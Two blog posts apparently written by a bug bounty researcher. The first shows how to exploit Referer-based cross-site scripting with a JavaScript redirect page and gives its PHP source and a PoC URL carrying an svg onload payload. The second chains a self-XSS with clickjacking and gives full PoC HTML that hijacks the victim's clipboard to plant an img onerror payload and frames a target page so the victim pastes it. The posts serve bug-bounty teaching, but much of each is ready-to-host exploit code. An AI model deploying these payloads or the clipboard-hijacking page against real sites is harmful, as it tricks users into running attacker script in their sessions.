referer-xss

Exploiting unusual Referer based XSS

Hello Everyone,

I’m writing this after a long break. This post is about how one can exploit referer based XSS using JavaScript based redirection, this is not something new but not found enough resources when I was looking to exploit something similar in the past so thought to summarise quickly and share it with everyone.

What is referer based XSS?

Like any other reflection based XSS where Referer value gets reflected into response body without any sanitization, this happens when a web application makes use of referer value for any feature/tracking, etc.

Note:- By default browsers encode referer URLs, so this only applies where application make use of URLdecoded referer URL.

Here is how vulnerable page looks like:-

http://p0c.geekboy.ninja/rxss-demo.php

How to exploit?

To control the referer header, one can make a redirection from the controlled page and append the XSS payloads in the URI, here is the hosted version of POC in action.

http://p0c.geekboy.ninja/rxss.php/<svg/onload=alert(document.domain)>?target=http://p0c.geekboy.ninja/rxss-demo.php

Source code:-

<?php header('X-XSS-Protection: 0'); ?>
<!DOCTYPE html>
<html>
<head>
<title>Referer based XSS testing</title>
</head>
<body>
<script>window.location.replace('<?php echo $_GET['target']; ?>');</script>
</body>
</html>

Feel free to host it for your self or use the hosted version, now go back and check if you missed any XSS in a similar scenario.

Resources:-

https://www.gremwell.com/exploiting_xss_in_referer_header
https://medium.com/@arbazhussain/referer-based-xss-52aeff7b09e7

Happy Hacking!

Cross Site Scripting for Fun: PasteJacking

Hi Everyone,

A few weeks ago I found an issue which initially looks like unexploitable, it was Self XSS again, this time in Search Box where users can search for books/documents, XSS get triggered once we type/paste our payload in search box via Applications AutoSuggestion feature, but once search get completed it gets blocked by WAF at the backend, so only way to trigger XSS was AutoSuggestion feature which only can be done by user himself, so we cant do anything fancy here like THIS.

Possible Exploitation?

Chaining this with ClickJacking, Right? I was lucky enough as the application had a strange behavior where they set X-Frame-Options for the non-authenticated users but not for authenticated users.

TIP: Look for those headers on every part of the application.

So I checked all the possible and more convening ways to chain this, and here are some ways we can do it.

  • Copy Paste
  • Drag and Drop
  • PasteJacking

Copy Paste:

In this, we simply ask the victim to copy paste the payload from our hosted page to framed page, which is not quite convincing.

Drag and Drop:

In this, we can hide our payload behind images or anything are convince the victim to drag and drop the object to the framed page, which is good vector indeed but didn’t work in my case, as typing or pasting is the only way to trigger the XSS.

Reference:

  1. http://c0rni3sm.blogspot.in/2016/04/drag-drop-xss-in-google.html
  2. https://vishwarajbhattrai.wordpress.com/2016/02/04/exploiting-self-xss/
  3. Python script to generate POC for Drag and Drop XSS.

PasteJacking

This is what I used to for my submission which is quite convincing for me, here we can control the clipboard of victim via JavaScirpt, and once he copied the object which can be anything, the attacker can set anything on the clipboard of the victim, so I used to set as XSS payload.

Reference:

1. https://github.com/dxa4481/Pastejacking

So I decided to choose PasteJacking to exploit this Self-XSS and this how it looks like

 

TIP: You can use: http://samy.pl/quickjack/quickjack.html for framing/slicing desired section of the page.

Poc Code:

<html>
<title>ClickJacking Lottery Game POC</title>
<body><center>
<h1>ClickJacking Lottery Game</h1>

<b><p>Can you copy me ?</p><b>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';


textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 100;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('<img src=x onerror=confirm(document.domain)>');
});

</script>


<script>function t(e){window.setTimeout("stop();",10);}window.onbeforeunload=t;var frames=new Array();</script>
<div qjid="quickjack" style="overflow: hidden; width: 304px; height: 38px; position: relative;" id="cksl6">
<iframe name="cksl7" src="https://www.target.com/home" style="border: 0pt none ; left: -875px; top: -8px; position: absolute; width: 1920px; height: 971px;" scrolling="no"></iframe></div>
&#8593; &#8593; &#8593; &#8593; &#8593; &#8593; <br><br>
<b>Paste here to WIN :) <b>

Limitations:

For exploiting issues similar to this, the application should be vulnerable for the ClickJacking.

Do let me know in comments if you exploited similar issues in more interesting ways, for any query comment or twitter it, and yes don’t copy paste blindly anything from the internet.